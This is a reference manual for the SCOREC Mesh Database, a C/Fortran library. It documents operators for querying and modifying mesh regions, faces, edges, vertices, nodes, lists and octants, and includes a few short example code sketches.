The mesh database can be operated in different modes, which have different internal data representations and different trade-offs between storage and speed, depending on the user's needs. One mode determines whether the database is static or dynamic. In the static mode the user may only retrieve data from the database; the stored data may not be altered. The dynamic mode, which allows modification of the database, uses dynamic data structures internally that take up additional storage. The other mode determines the type of topological data representation that the database uses. A modification of the Radial Edge Data Structure, called the Reduced Mixed-Mesh Data Structure, may be used. This topological representation includes “uses” in the representation of the mesh to allow for the unambiguous representation of non-manifold topologies. The other topological representation does not include entity uses, thus saving storage.
### 1.3 Debugging Tips
Each of the routines of the mesh database does run-time type checking on some of its arguments. The only arguments that are type checked are those of the following types: pRegion, pFace, pEdge and pVertex. If a wrong argument is found, the message “typecheck Error” is printed on the standard output. To debug this kind of problem, set a break point in the routine “typecheckError”, which is called whenever a type checking error is found. By then examining the function call stack, you can determine where the offending function call was made.
### 1.4 History
#### 1.4.1 Version 2.4
- Creation of mesh entities can now be done with one operator (see the MM_create* operators). The old operators used for this purpose have been deprecated and will be removed in future versions. See “Depreciated Operators” on page 30.
- Considerable improvements in both storage space and speed.
- Distinction between static and dynamic meshes and entities is almost completely eliminated. Future versions will support full functionality (equivalent of dynamic) for all meshes.
1.4.2 Version 2.3
- pNodes now derived type of pEntity.
- Minor bug fixes.
1.4.3 Version 2.2
- Improved performance of list objects.
- Other minor performance improvements.
- Minor bug fixes.
1.4.4 Version 2.1
- Preliminary Octant and octree operators added.
- Several bug fixes in dynamic mesh data structures.
1.4.5 Version 2.0
- The first full version of the mesh database.
- Support added for dynamic mesh data structures.
1.5 Getting Help/Reporting Problems
This document is intended to give you all the information you need to do anything you could possibly want to do with the mesh database. That is more or less impossible, of course, since I could never foresee everything anyone might try to do. If you have problems using the SCOREC mesh database or suggestions for enhancing it, please send me mail at the address below.
If you believe that you have found a bug in the mesh database, I would really like to hear about it. In order to assist in isolating the bug I ask that you try to demonstrate it with a short piece of code (the shorter, the better). Send bug reports to the address below.
All correspondence regarding the SCOREC Mesh Database should be sent to:
by email (preferred):
mbeall@scorec.rpi.edu
or:
Mark Beall
Scientific Computation Research Center
CII 7011
Rensselaer Polytechnic Institute
Troy, NY 12180
August 2, 1996
2.0 Database Query Operators
This section describes the operators for querying information from the mesh database. Operators for modifying the data stored in the mesh database may be found in Section 3.0 on page 20.
The documentation for each operator gives:
• the operator name
• input parameters
• output parameters
• input/output parameters
For each operator a description of the operator is given, followed by a description of any required arguments in addition to the object being operated on (the first argument).
Many of the operators return a list that is of type pPList. The operators that operate on these lists can be found in Section 4.1 on page 23.
Note: The operator PList_delete must be called for each list returned by any of these operators, or memory leaks and poor performance will result.
2.0.1 Using topological adjacency operators with geometric model entities
Although the database described here is a mesh database, it can also be used to provide some information about the topology of the geometric model that the mesh was created from. (Eventually this capability will be provided by a separate library that interfaces directly with the appropriate modeler.) There are some limitations on which topological adjacency operators may be called for entities from the geometric model: basically, operators that return multi-level adjacencies should not be called. The following topological adjacency operators are safe to call for geometric model entities: R_face, F_edge, F_region, E_vertex, E_face, V_edge. Any of the operators that return information other than adjacency information (e.g. R_numFaces) are safe to call.
2.0.2 Calling the operators from Fortran
Each of the operators may be called from Fortran. The name is the same as that of the C routine, but if the C routine returns a value (has a return type other than void), that value is returned in an extra parameter appended to the call. In addition, all parameters of the p* types (e.g. pEntity, pFace, etc.) are integers. For example,

int EN_id(pEntity entity)

would become

EN_id(INTEGER entity, INTEGER id)
2.1 Database Operators
\textbf{MD_init}
\hspace{1em} \textbf{void MD_init(void)}
Initializes the mesh database. This operator \textit{must} be called before any other operators in the mesh database may be called.
\textbf{MD_exit}
\hspace{1em} \textbf{void MD_exit(void)}
This operator should be called after all work with the mesh database is done and all objects have been deleted. No mesh operators may be called after this operator has been called. MD_init may be called again after MD_exit to reinitialize the mesh database.
\textbf{MD_debugListCacheOff}
\hspace{1em} \textbf{void MD_debugListCacheOff(void)}
This operator is provided for use with debugging tools that check for memory leaks, such as Purify and Sentinel. It turns off the mesh database's caching of list objects, which can make memory leaks appear to come from somewhere other than where they actually occur. This will decrease the performance of the mesh database. This operator should be called immediately after MD_init() and before any other mesh database operators.
2.2 General Entity Operators
The general entity operators, EN_*, may be called for any of the following objects: pRegion, pFace, pEdge, pVertex, pNode and pOctant. Some of the operators may not make sense for some of these entities (e.g. attaching a node to a node).
\textbf{EN_type}
\hspace{1em} \textbf{Type EN_type(pEntity)}
Return the type of pEntity. Type is one of the following: Tregion, Tface, Tedge, Tvertex, Toctant, Tnode. These symbols are defined in the header file for the mesh operators. The definitions of Type are such that for a region, face, edge and vertex the value corresponds to the dimension of the entity.
\textit{Fortran note:} For Fortran the types are defined as follows:
0=vertex, 1=edge, 2=face, 3=region, 5=octant, 6=node
**EN_tag**
`int EN_tag(pGEntity entity)`
Returns the numeric tag associated with pGEntity. This tag is a number that the modeler that created the model uses to identify the entity. This operator only makes sense to call if entity is from a geometric model (not a mesh).
**EN_setID**
`void EN_setID(pEntity entity, int id)`
Set a numerical id for the given entity. This id is returned by the operator EN_id. This id may be changed by the mesh database if the operator M_writeSMS is called.
**EN_id**
`int EN_id(pEntity entity)`
Returns the numerical id for the given entity. This id may be set using the operator EN_setID.
### 2.2.1 Node Operators
The following two operators are used to attach nodes to entities and to retrieve the nodes once attached. Nodes attached to an entity are identified by the entity and a number. The convention is that nodes with numbers from zero up to the number of points on an entity are associated with the points attached to the entity; nodes with numbers less than zero are associated with the entity itself. Note that a node itself does not have coordinates: nodes that are associated with a point on an entity take the location of the point on the entity with which they are associated. Operators that act on nodes are given in Section 2.8 on page 15.
**EN_setNode**
`void EN_setNode(pEntity entity, int n, pNode node)`
Attaches node to point n on entity. The node that is being attached must have been previously created using the operator N_new. A single node may be attached to each point on an entity (i.e. if there are p points you may attach p different nodes, one at each point). In addition, multiple nodes may be attached to the entity itself.
**EN_node**
`pNode EN_node(pEntity entity, int n)`
Retrieves the node attached to point n on entity. Returns null if no node is attached to that point. If n<0 then retrieve the node associated with the entity itself.
2.2.2 Data Operators
The following operators are used to attach user defined data to any entity in a model. Two types of data may be attached to entities, either a pointer or an integer. The data is identified by a tag that is a four character string. When passing the tag to the operators the string must be at least four characters (only the first four of which are significant). For tags less than four characters the rest must be padded with blanks (note: the position of the blanks is significant “tag” and “tag ” are different tags). Currently there is no provision for saving user defined data if the mesh is written to a file.
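Since only the first four characters of a tag are significant and shorter tags must be blank-padded, it can help to normalize tags before attaching data. A minimal stdlib-only sketch (the helper `pad_tag` is ours, not part of the database API):

```c
#include <string.h>

/* Copy at most four characters of src into a 5-byte buffer,
   blank-padding on the right so "tag" becomes "tag ". */
static void pad_tag(char dst[5], const char *src)
{
    size_t i, n = strlen(src);
    for (i = 0; i < 4; i++)
        dst[i] = (i < n) ? src[i] : ' ';
    dst[4] = '\0';
}
```

Passing the padded buffer consistently (e.g. to EN_attachDataP and EN_dataP) avoids the “tag” vs. “tag ” mismatch described above.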
EN_attachDataP
void EN_attachDataP(pEntity entity, char *tag, void *data)
Attach the pointer data to entity with the id tag. See the above paragraph for a description of what makes a valid tag. tag must be unique on the entity, if there is already data with the tag tag on the entity the behavior of the operator is undefined. To modify existing data use the operator EN_modifyDataP.
EN_dataP
void * EN_dataP(pEntity entity, char *tag)
Retrieve the data with id tag from entity, if the tag does not exist on the entity a null pointer is returned.
EN_modifyDataP
int EN_modifyDataP(pEntity entity, char *tag, void *data)
Replace the existing data with id tag on entity with data. The data pointed to by the original pointer is not deleted, so unless a reference to this data is kept elsewhere this may cause memory leaks. The return value will be zero if the tag does not exist on the entity.
EN_attachDataI
void EN_attachDataI(pEntity entity, char *tag, int data)
Attach the integer data to entity with the id tag. See note after description of EN_dataI for a restriction on using this operator. tag must be unique on the entity, if there is already data with the tag tag on the entity the behavior of the operator is undefined. To modify existing data use the operator EN_modifyDataI.
EN_dataI
int EN_dataI(pEntity entity, char *tag)
Retrieve the data with id tag from entity, if the tag does not exist on the entity a zero is returned.
Note: since a zero is returned if the tag does not exist, it is not possible to use this operator to test for the existence of data with the given tag unless zero is not a valid value for the data.
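This is the usual in-band-sentinel ambiguity: a stored zero and a missing tag look identical to the caller. A small stdlib-only illustration with a toy lookup table (the names here are ours, not the library's):

```c
#include <string.h>

/* Toy tag table: returns 0 both when the tag is missing and when
   the stored value is 0 -- the same ambiguity as EN_dataI. */
struct tagval { const char *tag; int val; };

static int lookup(const struct tagval *t, int n, const char *tag)
{
    int i;
    for (i = 0; i < n; i++)
        if (strcmp(t[i].tag, tag) == 0)
            return t[i].val;
    return 0; /* missing: indistinguishable from a stored 0 */
}
```

If zero is a legal value for your data, one option is to store the value behind a pointer with EN_attachDataP instead, where a null return from EN_dataP unambiguously means the tag is absent.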
**EN_modifyDataI**
\[\text{int EN\_modifyDataI(pEntity entity, char *tag, int data)}\]
Replace the existing data with id tag on entity with data. The return value will be zero if the tag does not exist on the entity.
**EN_removeData**
\[\text{void EN\_removeData(pEntity entity, char *tag)}\]
Removes the data with id tag from entity. In the case of pointer data, the data being pointed to is not disposed of (i.e. free() is not called); the user must free that memory to avoid memory leaks.
### 2.3 Region Operators
**R\_whatIn**
\[\text{pGEntity R\_whatIn(pRegion region)}\]
Returns the entity on the geometric model that region is classified on.
**R\_numFaces**
\[\text{int R\_numFaces(pRegion region)}\]
Returns the number of faces that enclose region.
**R\_face**
\[\text{pFace R\_face(pRegion Region, int n)}\]
Returns face \(n\) on Region
\(n\): Index of face on region to return. The first face is \(n=0\).
**R\_faceDir**
\[\text{int R\_faceDir(pRegion Region, int n)}\]
Returns the direction of face \(n\) on Region. Returns 1 if the face is being used such that the normal of the face points outside the region, returns 0 otherwise.
\(n\): Index of face on region to return direction for. The first face is \(n=0\).
**R\_faces**
\[\text{pList R\_faces(pRegion region)}\]
Returns a list of the faces on region. The list returned by this operator must be deleted (using the operator PList\_delete) to avoid memory leaks.
**R\_edges**
\[\text{pList R\_edges(pRegion region)}\]
Returns a list of the edges on region. The edges are returned in the order shown in Figure 1; the order for other shaped regions is undefined. The vertex ordering in Figure 2 and edge ordering in Figure 1 are correct relative to one another (i.e. edge 3 is between vertex 0 and vertex 3).

**FIGURE 1. Edge Order on a Region**
**R_vertices**
\[ pList \ R\_vertices(pRegion \ region) \]
Returns a list of the vertices that are on region. The vertices are returned in the order shown in Figure 2; the order for other shaped regions is undefined.

**FIGURE 2. Vertex Order on a Region**
**R_inClosure**
\[ int \ R\_inClosure(pRegion \ region, \ pEntity \ entity) \]
Checks if entity is in the closure of region. entity can be a pRegion, pFace, pEdge, or pVertex. Returns 1 if entity is in the closure of region, 0 if it is not.
**R_dirUsingFace**
\[ int \ R\_dirUsingFace(pRegion \ region, \ pFace \ face) \]
Returns the direction region is using face.
### 2.4 Face Operators
**F_whatIn**
\[ pGEntity \ F\_whatIn(pFace \ face) \]
Returns the entity on the geometric model that face is classified on.
**F_numEdges**
```c
int F_numEdges(pFace face)
```
Returns the number of edges that enclose face.
**F_edge**
```c
pEdge F_edge(pFace face, int n)
```
Returns the \( n \)th edge on face. The first edge is \( n=0 \). Edges are counterclockwise, with respect to the normal, around face.
**F_edgeDir**
```c
int F_edgeDir(pFace face, int n)
```
Returns the direction in which face is using edge \( n \). 1=using in the direction that edge \( n \) is defined in, i.e. in the direction from the first to the second vertex. The first edge is \( n=0 \).
**F_region**
```c
pRegion F_region(pFace face, int n)
```
Returns region \( n \) (\( n=0,1 \)) on face. Returns null if no region is attached to that side of the face.
\( n \): \( n=1 \) is the region on the side of the positive normal to the face.
**F_regions**
```c
pList F_regions(pFace face)
```
Returns a list containing the two regions on a face.
**F_edges**
```c
pList F_edges(pFace face, int dir, pVertex vtx)
```
Returns the edges on face, in the direction \( \text{dir} \), starting with the edge that begins with \( \text{vtx} \).
\( \text{dir} \): If \( \text{dir} = 1 \) then edges are returned in the direction that face is defined in, otherwise they are returned in the opposite direction.
\( \text{vtx} \): If \( \text{vtx} \) is specified the edges are returned in the order such that the first edge has \( \text{vtx} \) on the end opposite the vertex shared with the second edge. If \( \text{vtx} \) is not specified (i.e. passed in as null) then the edges will be returned with the first edge being the first edge that was used to define face.
For the face shown below (the positive normal is coming out of the page), the call \( \text{F_edges}(F_1, 1, V_2) \) will return \( E_2, E_3, E_1 \), the call \( \text{F_edges}(F_1, 0, V_1) \) will return \( E_3, E_2, E_1 \).
FIGURE 3. Ordering for F_edges
F_vertices
\[ pList \ F\_vertices(pFace \ face, \ int \ dir) \]
Returns the vertices on face in the direction dir.
- \textbf{dir}: If \textit{dir} = 1 then vertices are returned in the direction that \textit{face} is defined in (counterclockwise around the normal), otherwise they are returned in the opposite direction.
F_inClosure
\[ int \ F\_inClosure(pFace \ face, \ pEntity \ entity) \]
Checks if \textit{entity} is in the closure of \textit{face}. \textit{entity} can be a pFace, pEdge or pVertex. Returns 1 if \textit{entity} is in the closure of \textit{face}, 0 if it is not.
F_dirUsingEdge
\[ \text{int } F\_dirUsingEdge(pFace \ face, \ pEdge \ edge) \]
Returns the direction \textit{face} is using \textit{edge}.
2.5 Edge Operators
E_whatIn
\[ pGEntity \ E\_whatIn(pEdge \ edge) \]
Returns the entity on the geometric model that \textit{edge} is classified on.
E_vertex
\[ pVertex \ E\_vertex(pEdge \ edge, \ int \ n) \]
Returns the \textit{n}th (\textit{n}=0,1) vertex on \textit{edge}.
E_numFaces
\[ int \ E\_numFaces(pEdge \ edge) \]
Returns the number of faces using \textit{edge}.
E_face
\[ pFace \ E\_face(pEdge \ edge, \ int \ n) \]
Returns the \( n \)th face using \texttt{edge}. The first face is \( n=0 \). The faces are not returned in any particular order.
\textbf{E\_regions} \hspace{1cm} \texttt{pList E\_regions(pEdge edge)}
Returns a list of the regions that \texttt{edge} is in the closure of.
\textbf{E\_inClosure} \hspace{1cm} \texttt{int E\_inClosure(pEdge edge, pEntity entity)}
Checks if \texttt{entity} is in the closure of \texttt{edge}. \texttt{entity} can be a \texttt{pEdge} or \texttt{pVertex}. Returns 1 if \texttt{entity} is in the closure of \texttt{edge}, 0 if it is not.
\textbf{E\_numPoints} \hspace{1cm} \texttt{int E\_numPoints(pEdge edge)}
Returns the number of interior points on \texttt{edge}.
\textbf{E\_point} \hspace{1cm} \texttt{pPoint E\_point(pEdge edge, int n)}
Returns the \( n \)th interior point on \texttt{edge}. The first point is \( n=0 \). If there is more than one point they are ordered along the edge such that the first one is closest to vertex 0 and the last one is closest to vertex 1.
\textbf{E\_otherFace} \hspace{1cm} \texttt{pFace E\_otherFace(pEdge edge, pFace face, pRegion region)}
Returns the face other than \texttt{face} on \texttt{edge} connected to \texttt{region}. If \texttt{face=NULL} the operator returns any face bounding \texttt{region} on \texttt{edge}. Returns a NULL if no face satisfying the given conditions can be found.
\textit{Note:} this operator only makes sense to use if the edge is part of a mesh (not a geometric model).
\textbf{E\_otherVertex} \hspace{1cm} \texttt{pVertex E\_otherVertex(pEdge edge, pVertex vertex)}
Returns the vertex on \texttt{edge} that is not \texttt{vertex}.
\textbf{E\_uses} \hspace{1cm} \texttt{pList E\_uses(pEdge edge)}
\texttt{***}
\section*{2.6 Vertex Operators}
\textbf{V\_whatIn} \hspace{1cm} \texttt{pGEntity V\_whatIn(pVertex vertex)}
Returns the entity on the geometric model that \texttt{vertex} is classified on.
\textbf{V\_numEdges} \hspace{1cm} \texttt{int V\_numEdges(pVertex vertex)}
Return the number of edges using \texttt{vertex}.
V_edge \hspace{1cm} pEdge V_edge(pVertex vertex, int n)
Return the \( n^{th} \) edge using vertex. The first edge is \( n=0 \). The edges are not returned in any particular order.
V_faces
V_regions \hspace{1cm} pList V_regions(pVertex vertex)
Returns a list of the regions that vertex is in the closure of.
V_point \hspace{1cm} pPoint V_point(pVertex vertex)
Return the point associated with vertex.
V_uses \hspace{1cm} pList V_uses(pVertex vertex)
Returns a list of the vertex uses that exist for vertex. If the vertex has no uses then NULL is returned.
VU_faces
VU_edges
2.7 Point Operators
P_x \hspace{1cm} double P_x(pPoint point)
Return the x coordinate of point.
P_y \hspace{1cm} double P_y(pPoint point)
Return the y coordinate of point.
P_z \hspace{1cm} double P_z(pPoint point)
Return the z coordinate of point.
P_id \hspace{1cm} int P_id(pPoint point)
Return the id of the point.
P_setID \hspace{1cm} void P_setID(pPoint point, int id)
Set the id of the point.
P_param1 \hspace{1cm} double P_param1(pPoint point)
Retrieves a single parameter value for point. To be used if point is on an entity classified on a model edge.
P_param2 void P_param2(pPoint point, double *r, double *s, int *patch)
Retrieves two parameter values (and an integer patch indicator) for point. To be used if point is on an entity classified on a model face.
P_setPos void P_setPos(pPoint point, double x, double y, double z)
Set the coordinates of point to x,y,z.
P_setParam1 void P_setParam1(pPoint point, double r)
Sets a single parameter value for point. To be used if point is on a mesh entity classified on a model edge.
P_setParam2 void P_setParam2(pPoint point, double r, double s, int patch)
Sets two parameter values (and an integer patch indicator) for point. To be used if point is on a mesh entity classified on a model face.
2.8 Node Operators
These operators are for manipulating nodes. For operators to set and retrieve nodes on mesh entities see Section 2.2.1 on page 7. Note that a node itself does not have coordinates, nodes that are associated with a point on an entity have the location of the point on the entity with which they are associated.
N_new pNode N_new(void)
Creates a new node.
N_num int N_num(pNode node)
Return the number associated with node.
N_setNum void N_setNum(pNode node, int n)
Sets the number associated with node to n.
N_delete void N_delete(pNode node)
Deletes node. This does not delete any references to the node, just the node itself.
N_whatIn
2.9 Model Operators
The term model is used to refer to a datatype that is either a topological representation of a mesh or of a geometric model. If an argument is specified to be a pModel then either a pMesh or a pGModel can be passed.
**MM_new**
\textit{pMesh MM\_new(int type, GMODEL model)}
\textit{MM\_NEW(INTEGER type, GMODEL model, MESH mesh)}
Creates a new mesh based on \textit{type} that is classified on \textit{model}.
- \textit{type}: pass a 0 (zero) for this argument if the mesh will not be modified; pass 1 if the mesh will be modified. Passing 1 creates a dynamic data structure for the mesh and makes all of the entities in the mesh dynamic; this option requires more memory to store the mesh.
- \textit{model}: object returned by operator GM\_new(). You may pass a 0 (zero) if there is no model associated with the mesh (operators returning classification information should not be called in this case). The model must be loaded using M\_load before the mesh is loaded although the model may be loaded after it is passed to MM\_new.
**GM_new**
\textit{pGModel GM\_new(int type)}
Creates a new geometric model based on \textit{type}.
- \textit{type}: pass a 0 (zero) for this argument.
**M_delete**
\textit{void M\_delete(pModel model)}
Deletes the object \textit{model} and releases all memory associated with it. All entities on \textit{model} are also deleted.
**M_load**
\textit{int M\_load(pModel model, char *filename)}
Loads a model from the file \textit{filename}. The only currently supported file formats are the SCOREC mesh and model formats, which are generally indicated by a .sms or .smd extension, respectively. The file extension is part of \textit{filename}. The return value is zero if the specified file could not be opened, non-zero otherwise.
**M_writeSMS**
\textit{void M\_writeSMS(pMesh mesh, char *filename, char *program)}
Writes out a file in the SCOREC mesh format for the given \textit{mesh}. The \textit{filename} is the full name of the file that will be written (i.e. a .sms is not appended to the name given). \texttt{program} should be the name of the program that is writing out the mesh file; this name is written to the .sms file. The string \texttt{program} must not contain space characters.
M_writeDXFile void M_writeDXFile(pMesh mesh, char *name)
***
M_nRegion int M_nRegion(pModel model)
M_nFace int M_nFace(pModel model)
M_nEdge int M_nEdge(pModel model)
M_nVertex int M_nVertex(pModel model)
M_nPoint int M_nPoint(pModel model)
Each of the above operators return the number of the appropriate entities that are on \texttt{model}.
M_nextRegion pRegion M_nextRegion(pModel model, void **flag)
M_nextFace pFace M_nextFace(pModel model, void **flag)
M_nextEdge pEdge M_nextEdge(pModel model, void **flag)
M_nextVertex pVertex M_nextVertex(pModel model, void **flag)
M_nextPoint pPoint M_nextPoint(pModel model, void **flag)
Each of the above operators, when called repeatedly, will return each entity of the appropriate type in the model. To initialize an operator to the first entity in the model, flag must be set to point to a null value. When the operator is called for the entity after the last one in the model it returns a null value. An example of using these operators is below.
\begin{verbatim}
pRegion region;
void *temp = 0;
while ( region = M_nextRegion(mesh, &temp) ) {
... do something ...
}
\end{verbatim}
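The `flag` argument in these loops is an opaque cursor owned by the caller. As a stdlib-only sketch of the same idiom (a toy function of ours, not part of the database API), a cursor-style iterator over an array can be written as:

```c
#include <stdint.h>
#include <stddef.h>

/* Miniature cursor iterator in the spirit of the M_next* operators:
   *flag starts as a null pointer, is advanced on each call, and the
   function returns NULL after the last element. */
static const char *next_name(const char **names, size_t count, void **flag)
{
    size_t i = (size_t)(uintptr_t)*flag; /* 0 on the very first call */
    if (i >= count)
        return NULL;                     /* past the last element */
    *flag = (void *)(uintptr_t)(i + 1);  /* store the advanced cursor */
    return names[i];
}
```

It is used exactly like the manual's loop: initialize a `void *t = 0;` and call `next_name(..., &t)` until it returns NULL.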
\textit{Important:} the operators below should be avoided if at all possible (the \texttt{M\_next*} operators should be used instead); they can be very inefficient, especially in the case of dynamic models.
\begin{verbatim}
M_region pRegion M_region(pModel model, int n)
M_face pFace M_face(pModel model, int n)
M_edge pEdge M_edge(pModel model, int n)
M_vertex pVertex M_vertex(pModel model, int n)
M_point pPoint M_point(pModel model, int n)
Each of the above operators return the \texttt{n}^{th} entity of the given type on \texttt{model}. Note: the first entity is \texttt{n}=0. These operators should generally not be used and the \texttt{M\_next*} operators should be used in their place.
\texttt{n}: index of entity on \texttt{model}.
\end{verbatim}
2.10 Mesh Operators
These operators operate only on meshes. They may be used whether a mesh is static or dynamic.
**MM_makeNodes**
```c
void MM_makeNodes(pMesh mesh, nodeType type)
```
Create nodes on the mesh corresponding to a specific type of node pattern (which determines which entities the nodes are created on).
- **type**: Valid types are (numerical values in parenthesis should be passed if calling from Fortran):
- MM_isoparametric (0): creates a node at each vertex and one associated with each point on any other entities.
**MM_nNode**
```c
int MM_nNode(pMesh mesh)
```
Returns the number of nodes on mesh.
**MM_addNode**
```c
void MM_addNode(pMesh mesh, pNode node)
```
Adds a node to the mesh. This operator just registers that the given node is part of the mesh; it does not affect any of the information about that node.
**MM_nextNode**
```c
pNode MM_nextNode(pMesh mesh, void **flag)
```
This operator, when called repeatedly, will return each of the nodes in the mesh. To initialize the operator to the first node in the mesh, flag must be set to point to a null value. An example of using this operator is below.
```c
pNode node;
void *temp = 0;
while ( node = MM_nextNode(mesh, &temp )){
... do something ...
}
```
**MM_removeNode**
```c
void MM_removeNode(pMesh mesh, pNode node)
```
Deletes the node from mesh.
3.0 Database Modification Operators
The following operators are used to modify the information in the mesh database. They may only be used if a dynamic mesh has been created.
3.1 Region Operators
R_setWhatIn
void R_setWhatIn(pRegion region, pEntity model_entity)
Set the classification of region to model_entity.
3.2 Face Operators
F_setWhatIn
void F_setWhatIn(pFace face, pGEntity what)
Set the classification of face to what.
F_chDir
void F_chDir(pFace face)
Flips face so that its positive normal is pointing in the opposite direction. This operator updates all of the entities adjacent to face to reflect this change (the direction that the face is being used by any regions is reversed and the direction that it is using any edges is reversed).
3.3 Edge Operators
E_setWhatIn
void E_setWhatIn(pEdge edge, pGEntity what)
Set the classification of edge to what.
E_setNpoint
void E_setNpoint(pEdge edge, int n)
Set the number of points on edge to n. Currently this operator does nothing and there is a limit of one point per edge; however, it should be called to ensure compatibility with future versions of the mesh database, which will not have this limitation.
E_setPoint
void E_setPoint(pEdge edge, pPoint pt)
Set point pt to be on edge.
3.4 Vertex Operators
V_setWhatIn
void V_setWhatIn(pVertex vertex, pGEntity what)
Set the classification of vertex to be on what.
V_setPoint
void V_setPoint(pVertex vertex, pPoint pt)
Set the point associated with \texttt{vertex} to be \texttt{pt}. There can only be one point associated with a vertex.
### 3.5 Point Operators
**P\_new**
\texttt{P\_new} \hspace{1cm} \textit{pPoint P\_new(void)}
Create a new point.
**P\_delete**
\texttt{void P\_delete(pPoint point)}
Delete point. This operator should not be called if the point is part of a mesh (i.e. if it has been attached to a mesh using the \texttt{M\_addPoint} operator). In this case the \texttt{M\_removePoint} operator should be called instead so that the mesh knows that the point has been deleted.
### 3.6 Model Operators
The term model is used to refer to a datatype that is either a topological representation of a mesh or of a geometric model. Where an argument of type \texttt{pModel} is given either a \texttt{pMesh} or a \texttt{pGModel} may be passed.
**M\_removeRegion**
\texttt{void M\_removeRegion(pModel model, pRegion region)}
**M\_removeFace**
\texttt{void M\_removeFace(pModel model, pFace face)}
**M\_removeEdge**
\texttt{void M\_removeEdge(pModel model, pEdge edge)}
**M\_removeVertex**
\texttt{void M\_removeVertex(pModel model, pVertex vertex)}
**M\_removePoint**
\texttt{void M\_removePoint(pModel model, pPoint point)}
Deletes the appropriate entity from the model and updates the entities pointing to the deleted entity.
### 3.7 Mesh Operators
These operators operate only on meshes.
**MM\_createR**
\texttt{pRegion MM\_createR(pMesh mesh, int nFace, pFace \*faces, int \*dirs, pGEntity gent)}
Returns a new region in the given \texttt{mesh}.
\textbf{\texttt{nFace}}: number of faces that define the region
\textbf{\texttt{faces}}: array (size=\texttt{nFace}) of faces bounding the region
\textbf{\texttt{dirs}}: array (size=\texttt{nFace}) of integers indicating the direction each face in \texttt{faces} is being used by the region (1=positive direction, 0 = negative direction)
\textbf{\texttt{gent}}: entity in the geometric model that this region is classified on
**MM_createF**
```c
pFace MM_createF(pMesh mesh, int nEdge, pEdge *edges, int *dirs,
pGEntity gent)
```
Returns a new face in the given mesh.
- **nEdge**: number of edges that define the face
- **edges**: array (size=nEdge) of edges bounding the face. The edges in this array should be given in order around the face.
- **dirs**: array (size=nEdge) of integers indicating the direction each edge in edges is being used by the face (1=positive direction, 0 = negative direction).
- **gent**: entity in the geometric model that this face is classified on
**MM_createE**
```c
pEdge MM_createE(pMesh mesh, pVertex v1, pVertex v2, pGEntity gent)
```
Returns a new edge in the given mesh.
- **v1, v2**: the two vertices bounding the edge
- **gent**: entity in the geometric model that this edge is classified on
**MM_createVP**
```c
pVertex MM_createVP(pMesh mesh, double x, double y, double z,
double *param, int unused, pGEntity gent)
```
Creates a new vertex and point in the given mesh. Returns only the vertex.
- **x,y,z**: spatial location of the vertex
- **param**: array containing the parametric location of the vertex on the entity it is classified on, gent. Size of this array equals the dimension of the parametric space (1 if gent is an edge, 2 if a face). Not used (pass 0) for vertices classified on a vertex or a region.
- **unused**: unused parameter - pass 0.
- **gent**: entity in the geometric model that this vertex is classified on
## 4.0 Utility Operators
### 4.1 pList Operators
A pList is a datatype that allows the manipulation of arbitrary length lists of Entities. The following operators are defined for pLists.
**PList_new**
```c
pList PList_new(void)
```
Creates a new pList.
**PList_delete**
```c
void PList_delete(pList list)
```
Deletes list. Does not delete the entities that are in list.
**PList_append**
```c
pList PList_append(pList list, pEntity item)
```
Appends item to list.
**PList_appUnique**
```c
pList PList_appUnique(pList list, pEntity item)
```
Appends item to list only if item is not already in list. This operator is less efficient than PList_append since it must search the list before adding the item.
**PList_size**
```c
int PList_size(pList list)
```
Returns the number of items in the list.
**PList_item**
```c
pEntity PList_item(pList list, int n)
```
Returns the n\(^{th}\) item in list. The first item in the list is n=0.
**PList_remItem**
```c
void PList_remItem(pList list, pEntity item)
```
Removes the given item from the list.
**PList_next**
**PList_clear**
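The documented pList semantics (append, appUnique's linear search before insertion, indexed access starting at n=0) can be modeled with a short self-contained sketch. This is only an illustration of the behavior described above; the struct layout and the `List_*` names are invented for the example and are not the library's actual implementation.

```c
#include <stdlib.h>

typedef void *pEntity; /* stand-in for the database's entity handle */

/* A minimal pList-like growable array, modeling the documented semantics. */
typedef struct {
    pEntity *items;
    int size, cap;
} List;

static List *List_new(void) {
    List *l = malloc(sizeof *l);
    l->size = 0;
    l->cap = 4;
    l->items = malloc(l->cap * sizeof *l->items);
    return l;
}

static void List_append(List *l, pEntity e) {
    if (l->size == l->cap) {
        l->cap *= 2;
        l->items = realloc(l->items, l->cap * sizeof *l->items);
    }
    l->items[l->size++] = e;
}

/* appUnique must search the list first, which is why the manual notes it
 * is less efficient than a plain append. */
static void List_appUnique(List *l, pEntity e) {
    for (int i = 0; i < l->size; i++)
        if (l->items[i] == e) return;
    List_append(l, e);
}

static int List_size(const List *l) { return l->size; }

/* The first item is n=0, matching PList_item. */
static pEntity List_item(const List *l, int n) { return l->items[n]; }
```

Note how a duplicate passed to `List_appUnique` is silently ignored, while `List_append` would store it twice.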
## 5.0 Octree Operators
These operators are a preliminary set of operators for accessing octant information that is related to the mesh. Although the operators exist, the data that the operators use is not currently automatically loaded into the database. If you desire to use these operators please contact me (See “Getting Help/Reporting Problems” on page 3.)
### 5.1 Octant Operators
An octant has been implemented as a type of pEntity. Therefore, in addition to the operators listed here, any of the operators listed in “General Entity Operators” on page 6 may be used.
When child octants are referred to by number, the numbering shown in the figure below is to be used.
FIGURE 4. Child octant numbering
**OC_new**
```c
pOctant OC_new(pOctant parent, int whichChild)
```
Creates a new octant. If the parent of the octant is given, OC_setChild will be called for the parent octant to notify the parent that the new octant is its child. The level of the new octant will be set to one greater than its parent's. The range for whichChild is 0 to 7. To create a root octant, pass 8 for whichChild and, for parent, the octree that the octant is the root of.
**OC_delete**
```c
void OC_delete(pOctant octant)
```
Deletes octant. If octant is terminal, removes the association of the octant with the entities that were inside of it. If octant is non-terminal, recursively descends the tree, deleting everything below octant by calling OC_delete on each child.
**OC_parent**
```c
pOctant OC_parent(pOctant octant)
```
Returns the parent octant of the given octant.
**OC_child**
```c
pOctant OC_child(pOctant octant, int n)
```
Returns the \( n^{th} \) child of octant. \( n \) must be between 0 and 7. Returns null if octant is a terminal octant.
**OC_children**
```c
int OC_children(pOctant, pOctant *children)
```
Fills the array, which must be at least of size 8, with the children of the octant.
**OC_setChild**
```c
void OC_setChild(pOctant, pOctant child, int n)
```
Stores child as the \( n^{th} \) child octant of the given octant.
**OC_deleteCh**
```c
void OC_deleteCh(pOctant)
```
Deletes the child octants of the given octant. Does nothing if the octant is a terminal octant. If the child octants are not terminal, also deletes their children. The list of entities set up by previous calls to OC_setEnt will be deleted from any octants before the octant is deleted. Any data attached with EN_attachData should be removed before an octant is deleted or memory could be leaked.
**OC_level**
```c
int OC_level(pOctant octant)
```
Returns the level of octant in the octree. The root octant is level 0.
